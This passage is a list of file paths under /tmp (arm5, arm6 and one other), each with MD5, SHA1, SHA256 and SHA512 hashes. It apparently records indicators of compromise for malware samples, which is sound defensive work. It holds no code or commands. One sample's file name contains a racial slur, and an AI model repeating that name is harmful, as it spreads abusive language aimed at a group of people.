SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f